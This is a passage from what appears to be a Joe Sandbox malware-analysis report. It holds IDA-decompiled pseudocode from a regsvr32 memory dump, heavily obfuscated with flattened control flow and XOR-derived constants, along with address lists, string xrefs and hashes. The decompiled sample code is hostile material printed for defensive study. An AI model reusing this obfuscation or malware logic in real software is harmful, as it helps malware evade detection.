							__eflags =  *_t876;
							if(__eflags == 0) {
								_t847 = _v12;
							} else {
								_push(_v188);
								_push(_v72);
								_push(_v232);
								_t847 = E040EE1F8(0x40d1a0c, _v180, __eflags);
								_t989 =  &(_t989[3]);
								_v12 = _t847;
							}
							_t946 = _v16 | _v172 | _v264 | _v200 | _v64 | _v256 | _v164 | _v32 | _v56;
							_t980 = _a32 & 1;
							__eflags = _t980;
							if(_t980 != 0) {
								__eflags = _t946;
							}
							_t976 = E040D4A88(1, _t946, _a48, _v156, 1, _t847, 1, _v208, _v92, _v300, _v100, _v292, _v224, 1, _v108);
							E040EFECB(_v12, _v68, _v76, _v84, _v288);
							_t989 =  &(_t989[0x10]);
							__eflags = _t976;
							if(_t976 == 0) {
								_t978 = 0x6d75a8e;
								goto L39;
							} else {
								_v36 = 1;
								E040F3E0E(_v276,  &_v36, _v284, _v52, _v60, 4, _t976);
								_t989 =  &(_t989[5]);
								__eflags = _t980;
								if(_t980 != 0) {
									E040EC8CF( &_v36, _t976,  &_v8, _v148, _v244, _v252, _v260, _v268);
									_t769 =  &_v36;
									 *_t769 = _v36 | _v236;
									__eflags =  *_t769;
									E040F3E0E(_v220,  &_v36, _v44, _v140, _v228, _v8, _t976);
									_t989 =  &(_t989[0xb]);
								}
								_t978 = 0xf81d281;
								goto L13;
							}
						} else {
							__eflags = _t978 - 0xdd5f83a;
							if(__eflags == 0) {
								__eflags = E040DEF0C(_t976, _v80, __eflags) - _v40;
								_t978 =  ==  ? 0x1a1d1c : 0x6a5d586;
								goto L13;
							} else {
								__eflags = _t978 - 0xedc04fb;
								if(_t978 == 0xedc04fb) {
									E040EE358(_v304, _v296, _t987, _v132);
								} else {
									__eflags = _t978 - 0xf81d281;
									if(_t978 == 0xf81d281) {
										_t885 =  *_t876;
										__eflags = _t885;
										if(_t885 == 0) {
											_t861 = 0;
											__eflags = 0;
										} else {
											_t861 = _a28[1];
										}
										_push(_t885);
										E040F10DC(_t976, _v192, _v4, _t885, _v272, _v136, _v24, _t861);
										_t989 =  &(_t989[7]);
										asm("sbb esi, esi");
										_t978 = (_t978 & 0x073022b4) + 0x6a5d586;
										goto L13;
									} else {
										__eflags = _t978 - 0xfd2ad77;
										if(_t978 != 0xfd2ad77) {
											goto L40;
										} else {
											_t978 = 0x352276a;
											goto L3;
										}
									}
								}
							}
						}
						goto L43;
					}
				}
			}

0x040e67f8
0x040e6800
0x040e680a
0x040e6811
0x040e6818
0x040e681f
0x040e6826
0x040e682d
0x040e682e
0x040e6835
0x040e6836
0x040e683d
0x040e6844
0x040e684b
0x040e6852
0x040e6853
0x040e6854
0x040e6859
0x040e6861
0x040e6864
0x040e686e
0x040e6878
0x040e6880
0x040e6882
0x040e688d
0x040e6892
0x040e689d
0x040e68a8
0x040e68b3
0x040e68be
0x040e68c9
0x040e68d4
0x040e68df
0x040e68ea
0x040e68f5
0x040e6900
0x040e690b
0x040e6916
0x040e6921
0x040e692c
0x040e6937
0x040e693f
0x040e6944
0x040e6951
0x040e6956
0x040e6960
0x040e6965
0x040e696b
0x040e6973
0x040e697e
0x040e6989
0x040e6994
0x040e699c
0x040e69a8
0x040e69ad
0x040e69b1
0x040e69b6
0x040e69c0
0x040e69cc
0x040e69d1
0x040e69d7
0x040e69e4
0x040e69e5
0x040e69e9
0x040e69f1
0x040e69fc
0x040e6a07
0x040e6a12
0x040e6a1d
0x040e6a28
0x040e6a30
0x040e6a3b
0x040e6a43
0x040e6a4b
0x040e6a53
0x040e6a5b
0x040e6a63
0x040e6a70
0x040e6a74
0x040e6a7c
0x040e6a84
0x040e6a8c
0x040e6a99
0x040e6a9d
0x040e6aa2
0x040e6aa7
0x040e6aaf
0x040e6abc
0x040e6ac0
0x040e6ac5
0x040e6aca
0x040e6ad2
0x040e6ae6
0x040e6aed
0x040e6af8
0x040e6b03
0x040e6b0b
0x040e6b13
0x040e6b18
0x040e6b20
0x040e6b28
0x040e6b30
0x040e6b38
0x040e6b42
0x040e6b46
0x040e6b4e
0x040e6b56
0x040e6b5b
0x040e6b63
0x040e6b68
0x040e6b70
0x040e6b78
0x040e6b80
0x040e6b88
0x040e6b95
0x040e6b99
0x040e6b9e
0x040e6ba6
0x040e6bae
0x040e6bb6
0x040e6bbe
0x040e6bcb
0x040e6bd4
0x040e6bd8
0x040e6be0
0x040e6bed
0x040e6bf3
0x040e6bfb
0x040e6c03
0x040e6c0b
0x040e6c13
0x040e6c1b
0x040e6c2a
0x040e6c2d
0x040e6c31
0x040e6c39
0x040e6c41
0x040e6c49
0x040e6c4e
0x040e6c56
0x040e6c5e
0x040e6c6b
0x040e6c6f
0x040e6c77
0x040e6c7f
0x040e6c8b
0x040e6c90
0x040e6c96
0x040e6c9e
0x040e6ca6
0x040e6cae
0x040e6cb6
0x040e6cbe
0x040e6cc9
0x040e6cd1
0x040e6cdc
0x040e6ce7
0x040e6cef
0x040e6cf7
0x040e6d03
0x040e6d08
0x040e6d0e
0x040e6d16
0x040e6d21
0x040e6d30
0x040e6d35
0x040e6d3e
0x040e6d49
0x040e6d5c
0x040e6d5d
0x040e6d64
0x040e6d6f
0x040e6d82
0x040e6d89
0x040e6d94
0x040e6d9f
0x040e6daa
0x040e6db5
0x040e6dc0
0x040e6dce
0x040e6dd2
0x040e6dda
0x040e6de2
0x040e6dea
0x040e6df7
0x040e6e02
0x040e6e0a
0x040e6e15
0x040e6e29
0x040e6e2e
0x040e6e37
0x040e6e42
0x040e6e4d
0x040e6e60
0x040e6e63
0x040e6e66
0x040e6e6d
0x040e6e78
0x040e6e80
0x040e6e88
0x040e6e90
0x040e6e98
0x040e6ea0
0x040e6eab
0x040e6eb3
0x040e6ebe
0x040e6ec9
0x040e6ed6
0x040e6eda
0x040e6ee2
0x040e6eea
0x040e6ef2
0x040e6efd
0x040e6f08
0x040e6f13
0x040e6f1e
0x040e6f29
0x040e6f34
0x040e6f3f
0x040e6f47
0x040e6f52
0x040e6f5d
0x040e6f68
0x040e6f70
0x040e6f7b
0x040e6f83
0x040e6f8d
0x040e6f99
0x040e6f9d
0x040e6fa5
0x040e6fb0
0x040e6fb8
0x040e6fc3
0x040e6fce
0x040e6fe1
0x040e6fe8
0x040e6ff3
0x040e7005
0x040e700a
0x040e701a
0x040e701d
0x040e7024
0x040e7031
0x040e7039
0x040e7041
0x040e704f
0x040e7054
0x040e7058
0x040e7060
0x040e706b
0x040e7076
0x040e7081
0x040e708c
0x040e7097
0x040e70a2
0x040e70b1
0x040e70b2
0x040e70b6
0x040e70c3
0x040e70c7
0x040e70cf
0x040e70d7
0x040e70db
0x040e70e0
0x040e70e8
0x040e70f0
0x040e70fb
0x040e7103
0x040e710e
0x040e7119
0x040e7124
0x040e712f
0x040e713a
0x040e7145
0x040e7150
0x040e715b
0x040e7166
0x040e7171
0x040e7179
0x040e7186
0x040e718a
0x040e718f
0x040e7197
0x040e719f
0x040e71a7
0x040e71af
0x040e71b7
0x040e71bf
0x040e71ca
0x040e71d5
0x040e71e0
0x040e71eb
0x040e71f3
0x040e71fe
0x040e7209
0x040e721c
0x040e7223
0x040e722e
0x040e723c
0x040e7240
0x040e7245
0x040e724d
0x040e7255
0x040e725d
0x040e7262
0x040e726f
0x040e7273
0x040e727b
0x040e7285
0x040e7291
0x040e7292
0x040e7296
0x040e729e
0x040e72a6
0x040e72b1
0x040e72bc
0x040e72c7
0x040e72d2
0x040e72da
0x040e72e5
0x040e72f0
0x040e72f8
0x040e7300
0x040e7308
0x040e730d
0x040e7315
0x040e7329
0x040e7330
0x040e733b
0x040e7346
0x040e734e
0x040e735b
0x040e735f
0x040e7367
0x040e736f
0x040e737a
0x040e7382
0x040e738a
0x040e7395
0x040e73a0
0x040e73ab
0x040e73b6
0x040e73be
0x040e73c6
0x040e73ce
0x040e73d6
0x040e73de
0x040e73f1
0x040e73f8
0x040e7400
0x040e740b
0x040e741e
0x040e7425
0x040e742d
0x040e7438
0x040e7443
0x040e744e
0x040e7456
0x040e7461
0x040e7469
0x040e7476
0x040e747a
0x040e7482
0x040e748a
0x040e7495
0x040e74a0
0x040e74ab
0x040e74b3
0x040e74b8
0x040e74bd
0x040e74c5
0x040e74cd
0x040e74d2
0x040e74da
0x040e74e5
0x040e74f0
0x040e74f8
0x040e7503
0x040e750a
0x040e7511
0x040e7511
0x040e7511
0x040e7516
0x040e7516
0x040e751a
0x040e751a
0x040e751a
0x040e7520
0x00000000
0x00000000
0x040e7526
0x040e76ab
0x00000000
0x040e752c
0x040e7532
0x040e7699
0x040e769b
0x040e76a2
0x040e76a3
0x00000000
0x040e7538
0x040e753e
0x040e7651
0x040e765d
0x040e7672
0x040e7679
0x040e767e
0x040e7683
0x040e7915
0x040e7915
0x040e791c
0x00000000
0x040e7544
0x040e754a
0x040e761e
0x040e7623
0x00000000
0x040e7550
0x040e7556
0x040e75f0
0x040e75f5
0x040e75fa
0x040e75fc
0x040e75fc
0x00000000
0x040e755c
0x040e7563
0x040e7921
0x040e7921
0x040e7927
0x040e7516
0x00000000
0x040e7516
0x040e7569
0x040e75b6
0x040e75bb
0x040e75c2
0x040e75c7
0x040e75d0
0x040e75d5
0x00000000
0x040e75d5
0x040e7563
0x040e7556
0x040e754a
0x040e753e
0x040e7532
0x040e7945
0x040e7951
0x040e7951
0x040e76b5
0x040e76b7
0x040e7772
0x040e7775
0x040e77a6
0x040e7777
0x040e7777
0x040e7783
0x040e778a
0x040e7795
0x040e779a
0x040e779d
0x040e779d
0x040e77e6
0x040e77ed
0x040e77ed
0x040e77ef
0x040e77f1
0x040e77f1
0x040e7841
0x040e7858
0x040e785d
0x040e7860
0x040e7862
0x040e7910
0x00000000
0x040e7868
0x040e788b
0x040e7892
0x040e7897
0x040e789a
0x040e789c
0x040e78c6
0x040e78d6
0x040e78d6
0x040e78d6
0x040e78fe
0x040e7903
0x040e7903
0x040e7906
0x00000000
0x040e7906
0x040e76bd
0x040e76bd
0x040e76c3
0x040e7763
0x040e776a
0x00000000
0x040e76c9
0x040e76c9
0x040e76cf
0x040e793e
0x040e76d5
0x040e76d5
0x040e76db
0x040e76f3
0x040e76f5
0x040e76f7
0x040e7705
0x040e7705
0x040e76f9
0x040e7700
0x040e7700
0x040e7707
0x040e772c
0x040e7731
0x040e7736
0x040e773e
0x00000000
0x040e76dd
0x040e76dd
0x040e76e3
0x00000000
0x040e76e9
0x040e76e9
0x00000000
0x040e76e9
0x040e76e3
0x040e76db
0x040e76cf
0x040e76c3
0x00000000
0x040e76b7
0x040e7516

Strings

c', xrefs: 040E6EF2
!, xrefs: 040E747A
LG, xrefs: 040E6892
R<, xrefs: 040E6DC0
^, xrefs: 040E706B
OI, xrefs: 040E7058
=o, xrefs: 040E6F70
H#, xrefs: 040E73B6
OHR, xrefs: 040E7171
2 ], xrefs: 040E72F0
)fVX, xrefs: 040E68B3
&B, xrefs: 040E6E80
n3u, xrefs: 040E692C

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
API String ID: 0-4090907037
Opcode ID: 02a9e34b855b58f02c4da78620b887eae49355a7143faf84e41f3e40dd1f6436
Instruction ID: d9105d9bfb6b55115dcb9576481d07180208028320c3de6847d32d2a74b5e2eb
Opcode Fuzzy Hash: 02a9e34b855b58f02c4da78620b887eae49355a7143faf84e41f3e40dd1f6436
Instruction Fuzzy Hash: 85920FB1509381CFE3B9CF26C54AA9BBBE1BBC4308F00891DE1D996260D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040EA474, Relevance: 15.4, Strings: 12, Instructions: 357
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040EA474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E040D1A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E040F2D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x40d192c,  &_v520,  &_v1040, E040EE1F8(0x40d192c, _v2696, __eflags));
						E040EFECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E040E85FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
					E040F0DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
					 *((short*)(E040E09DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
					E040DBAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
					_push(_v2684);
					_push(_v2732);
					_push(_v2620);
					E040F2D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0x40d188c,  &_v2080,  &_v2600, E040EE1F8(0x40d188c, _v2780, _t500));
					E040EFECB(_t436, _v2616, _v2692, _v2724, _v2636);
					_t449 = _v2744;
					_t422 = E040DBFBE( &_v2080, _t487, _v2716);
					_t492 =  &(_t492[0x18]);
					if(_t422 != 0) {
						_t488 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t488 = 0x6430241;
				goto L7;
			}

0x040ea474
0x040ea47e
0x040ea480
0x040ea48a
0x040ea492
0x040ea497
0x040ea49f
0x040ea4a7
0x040ea4af
0x040ea4b4
0x040ea4bc
0x040ea4c4
0x040ea4cf
0x040ea4d7
0x040ea4e2
0x040ea4ea
0x040ea4ef
0x040ea4f7
0x040ea4ff
0x040ea507
0x040ea50b
0x040ea513
0x040ea51b
0x040ea526
0x040ea52e
0x040ea539
0x040ea541
0x040ea546
0x040ea54a
0x040ea552
0x040ea55d
0x040ea568
0x040ea573
0x040ea586
0x040ea58d
0x040ea598
0x040ea59d
0x040ea5a5
0x040ea5aa
0x040ea5b9
0x040ea5bc
0x040ea5c0
0x040ea5c8
0x040ea5d3
0x040ea5de
0x040ea5e9
0x040ea5f1
0x040ea5f9
0x040ea5fe
0x040ea603
0x040ea60b
0x040ea616
0x040ea621
0x040ea62c
0x040ea634
0x040ea639
0x040ea641
0x040ea649
0x040ea65f
0x040ea666
0x040ea671
0x040ea67d
0x040ea680
0x040ea684
0x040ea68c
0x040ea694
0x040ea6a7
0x040ea6ae
0x040ea6bb
0x040ea6c6
0x040ea6d1
0x040ea6dc
0x040ea6e7
0x040ea6ef
0x040ea6fa
0x040ea705
0x040ea710
0x040ea71b
0x040ea726
0x040ea731
0x040ea73c
0x040ea74b
0x040ea74e
0x040ea757
0x040ea75b
0x040ea763
0x040ea770
0x040ea774
0x040ea77c
0x040ea784
0x040ea78f
0x040ea79a
0x040ea7a5
0x040ea7ad
0x040ea7b5
0x040ea7ba
0x040ea7c2
0x040ea7ca
0x040ea7d2
0x040ea7da
0x040ea7e2
0x040ea7f8
0x040ea7ff
0x040ea80a
0x040ea815
0x040ea81d
0x040ea828
0x040ea834
0x040ea839
0x040ea843
0x040ea846
0x040ea84a
0x040ea852
0x040ea85a
0x040ea862
0x040ea867
0x040ea86f
0x040ea877
0x040ea87f
0x040ea887
0x040ea88c
0x040ea894
0x040ea89c
0x040ea8a1
0x040ea8a9
0x040ea8b1
0x040ea8b9
0x040ea8be
0x040ea8c3
0x040ea8cb
0x040ea8d8
0x040ea8e1
0x040ea8e7
0x040ea8f4
0x040ea901
0x040ea909
0x040ea90e
0x040ea913
0x040ea91b
0x040ea923
0x040ea92b
0x040ea933
0x040ea937
0x040ea93f
0x040ea94a
0x040ea952
0x040ea95d
0x040ea965
0x040ea96d
0x040ea975
0x040ea97d
0x040ea985
0x040ea98d
0x040ea99c
0x040ea99d
0x040ea9a1
0x040ea9a6
0x040ea9ae
0x040ea9bb
0x040ea9bf
0x040ea9c7
0x040ea9cf
0x040ea9d7
0x040ea9e2
0x040ea9ed
0x040ea9f8
0x040eaa00
0x040eaa05
0x040eaa0d
0x040eaa12
0x040eaa1a
0x040eaa25
0x040eaa2d
0x040eaa38
0x040eaa43
0x040eaa4b
0x040eaa56
0x040eaa61
0x040eaa69
0x040eaa74
0x040eaa7f
0x040eaa8a
0x040eaa95
0x040eaa9d
0x040eaaa9
0x040eaaab
0x040eaaaf
0x040eaab7
0x040eaabf
0x040eaac7
0x040eaacf
0x040eaad7
0x040eaadf
0x040eaaed
0x040eac4c
0x040eac51
0x040eac5d
0x040eac61
0x040eacaa
0x040eacca
0x040eacd9
0x00000000
0x040eacfa
0x040eaaf3
0x040eaaf5
0x040eac13
0x040eac13
0x040eac19
0x00000000
0x00000000
0x00000000
0x00000000
0x040ead07
0x040ead07
0x040ead07
0x040eab12
0x040eab37
0x040eab5b
0x040eab60
0x040eab6c
0x040eab70
0x040eabc2
0x040eabe2
0x040eabee
0x040eabfa
0x040eabff
0x040eac04
0x040eac0a
0x00000000
0x040eac0a
0x00000000
0x040eac04
0x040eac11
0x00000000

Strings

L, xrefs: 040EA9ED
%Z, xrefs: 040EA694
n,, xrefs: 040EA4FF
p(}, xrefs: 040EA731
$P, xrefs: 040EA47C
Q/O, xrefs: 040EA9F8
.7Y, xrefs: 040EA684
h, xrefs: 040EA852
3k, xrefs: 040EA7D2
spC, xrefs: 040EA4E2
.5, xrefs: 040EA877
+f%, xrefs: 040EA86F

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
API String ID: 0-500290626
Opcode ID: 952c5c253ec5edd264aece5279b96f67b1cdd1f41ca807100355aa6f3dfe0754
Instruction ID: e4c9fdfb8ee95235542eb2c6ba54965cfb3f0b7ecee311c5c5b644dcf99230cd
Opcode Fuzzy Hash: 952c5c253ec5edd264aece5279b96f67b1cdd1f41ca807100355aa6f3dfe0754
Instruction Fuzzy Hash: E112F1715093809FE3A8CF61C989A8BFBE1FBC4348F108A1DE1DA96260D7B59549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 040ED1BC, Relevance: 15.3, Strings: 12, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E040ED1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t309;
				void* _t322;
				intOrPtr _t325;
				intOrPtr _t328;
				intOrPtr _t332;
				void* _t336;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t364;
				intOrPtr _t365;
				void* _t382;
				intOrPtr _t385;
				void* _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_push(_a24);
				_t395 = __edx;
				_push(_a20);
				_v288 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(__ecx);
				_v312 = 0xeda4ef;
				_t397 = _t396 + 0x20;
				_v312 = _v312 + 0x7c87;
				_v312 = _v312 ^ 0x00e6bc42;
				_t346 = 0;
				_v356 = 0x83a7cc;
				_t349 = 0x902256d;
				_v356 = _v356 << 0xd;
				_v356 = _v356 | 0xd496e6a5;
				_v356 = _v356 ^ 0xf4f8676c;
				_v388 = 0x254bab;
